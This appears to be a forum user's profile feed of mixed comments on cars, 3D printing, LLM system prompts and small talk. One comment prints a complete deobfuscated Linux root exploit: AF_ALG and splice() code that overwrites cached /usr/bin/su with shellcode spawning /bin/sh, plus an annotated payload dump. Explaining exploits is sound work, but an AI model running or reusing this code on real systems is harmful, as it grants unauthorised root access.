
Posts: 14 · Comments: 5088 · Joined: 2 yr. ago

  • maybe i'm the weird one because i bought my car specifically for the unusual drivetrain. ...that and the fascia. it seems to have paid off too; 180000km and still not even any weird noises.

  • aren't "metamates" what facebook calls its employees now? if so the dissonance is real

  • violet?

  • what's the drivetrain? is it a series or parallel hybrid?

    Edit: looks like it's got a 6-speed dsg. not a series hybrid then.

    i don't understand why the series hybrids are dying out. on paper it's a better system. changing nothing else, my 2012 ampera would get like 250km range with today's battery tech and yet the top-trim phev's are barely scratching 100km.

  • germany.jpeg

  • i don't know if that's possible

  • here's my attempt at deobfuscating it:

    ```python
    #!/usr/bin/env python3

    import os
    import zlib
    import socket as s


    def inject(file, offset, data):
        sock = s.socket(s.AF_ALG, s.SOCK_SEQPACKET)
        sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))

        sock.setsockopt(s.SOL_ALG, s.SO_DEBUG, bytes.fromhex("0800010000000010" + "0" * 64))
        sock.setsockopt(s.SOL_ALG, s.SO_DONTROUTE, None, optlen=4)
        conn, _ = sock.accept()

        conn.sendmsg(
            [b"AAAA" + data],
            [
                (s.SOL_ALG, s.MSG_OOB | s.MSG_PEEK, b"\x00\x00\x00\x00"),
                (s.SOL_ALG, s.MSG_PEEK, b"\x10\x00\x00\x00" + b"\x00" * 16),
                (s.SOL_ALG, s.MSG_DONTROUTE, b"\x08\x00\x00\x00"),
            ],
            s.MSG_MORE,
        )
        r, w = os.pipe()
        os.splice(file, w, offset + 4, offset_src=0)
        os.splice(r, conn.fileno(), offset + 4)
        try:
            conn.recv(8 + offset)
        except:
            pass


    binary = os.open("/usr/bin/su", os.O_RDONLY)
    offset = 0
    payload = zlib.decompress(
        bytes.fromhex(
            "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301"
            "d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b96"
            "75c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
        )
    )

    while offset < len(payload):
        inject(binary, offset, payload[offset : offset + 4])
        offset += 4

    os.system("su")
    ```

    as far as i understand the writeup, the weakness is in the splice() function, because it silently crosses an auth boundary. the payload looks like this:

    ```
    00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............ # ELF x86-64 v1, executable
    00000010: 0200 3e00 0100 0000 7800 4000 0000 0000  ..>.....x.@.....
    00000020: 4000 0000 0000 0000 0000 0000 0000 0000  @...............
    00000030: 0000 0000 4000 3800 0100 0000 0000 0000  ....@.8......... # contains 1 56-bit program header
    00000040: 0100 0000 0500 0000 0000 0000 0000 0000  ................ # program header starts
    00000050: 0000 4000 0000 0000 0000 4000 0000 0000  ..@.......@.....
    00000060: 9e00 0000 0000 0000 9e00 0000 0000 0000  ................ # flags r-x
    00000070: 0010 0000 0000 0000 31c0 31ff b069 0f05  ........1.1..i.. # program starts
    00000080: 488d 3d0f 0000 0031 f66a 3b58 990f 0531  H.=....1.j;X...1
    00000090: ff6a 3c58 0f05 2f62 696e 2f73 6800 0000  .j<X../bin/sh...
    ```

    it's an ELF header that replaces the one on the cached version of the binary (su in this case).

  • you'd only need to change the payload part, which is a compiled x86 ELF header.

  • get rotated idiot

  • "this is the one thing we didn't want to happen"

  • unless apple is doing something weird, the init system is a program, not part of the kernel.

  • configuration is things like temperature, output cutoff, and tool use. those are out-of-band. the system prompt, being in-band, can not be configuration. it's like calling a http request configuration for the response.

  • of course. but the larger the context grows the less it affects the output. there is some ways around this, like moving the system prompt last in the context before every answer, but the very existence of the system prompt to begin with is a hack. what's really needed is a functional rules-based pre- and post-filtering system for a chatbox to be safe. personally i think the chatbox "style" has played out its role and is living on as a gimmick. actual tooling built with language models is stuff like LSP servers and accessibility software, and that needs rigid configuration.

  • because the system prompt is not configuration, it's input. it has the same priority as whatever the user types in, and it takes up valuable space in the context window.

    to add onto what pennomi is saying, this also shows that openai doesn't understand language models. the only actual functionality the llm has is still "given the previous text, what is the most likely character/phoneme/token?", so rather than (to use an analogy) change the font in their word document they add in a sentence in the middle of the document that says "everything from here is in comic sans".

    but it's not surprising that they'd do this. if we've learned anything from the claude frontend leak earlier, where their "sentiment analysis" tool for input text was a regex (you literally have a language model! that's like the only thing it's good at!), i think it's pretty clear most of the big players in the llm space have gotten high on their own supply and can't be expected to actually reason about the operations the system is actually performing.

  • Me_irl

  • just start being honest. go long. describe your latest bowel movement in detail. they'll stop asking eventually.

  • holy shit it's marcus gearsowar!

  • kinda, yeah. i halved the print speeds and lowered the fan to 40%, which makes petg come out beautifully given that the support material cooperates. support interface ironing is crucial, as is lowering the interface z distance to basically as low as it can go. if the support interface area is less than like 5mm² it's basically a coin toss as to whether it sticks or not. the extruder can even drag small parts loose on retraction, if your temps are too low. it took finding a detail hanging from the wiping brush for me to figure that one out.

    also, if you're experimenting and still getting spaghetti, one thing to look out for is that there is currently a bug with some of the tree support generation in orca. whenever the slicer generates a big combined tree, check the preview carefully because chances are the supports start in mid-air, 10-20 layers above the plate. there is a setting called "base pattern" that's supposed to work around that but i haven't gotten it to work.

  • getting a botjob at a croncert

  • 3DPrinting @lemmy.world

    can somebody help me figure out what the hell is going on with my petg prints?

  • Voyager @lemmy.world

    the latest update has a big gap below the bottom menu

  • 3DPrinting @lemmy.world

    how do i fix top surface bulging in orcaslicer?

  • Casual Conversation @piefed.social

    i just realised i might have an instinctive need to "yes, and".

  • Selfhosted @lemmy.world

    What's the security situation when opening a jellyfin server up for casting?

  • Feddit.nu @feddit.nu

    Regarding images on lemmy

  • Lemmy Shitpost @lemmy.world

    asked and answered

  • Casual Conversation @piefed.social

    got laid off

  • Ask Lemmy @lemmy.world

    what's your ringtone?

  • Asklemmy @lemmy.ml

    what's your ringtone?

  • Buy European @feddit.uk

    Playing card sleeves?

  • Map Enthusiasts @sopuli.xyz

    Original name of the Sony Walkman

  • Citybuilders @sh.itjust.works

    I want a citybuilder with less building.

  • KDE @lemmy.kde.social

    Any ideas? My desktop always ends up like this on login, i don't even know where to begin to fix.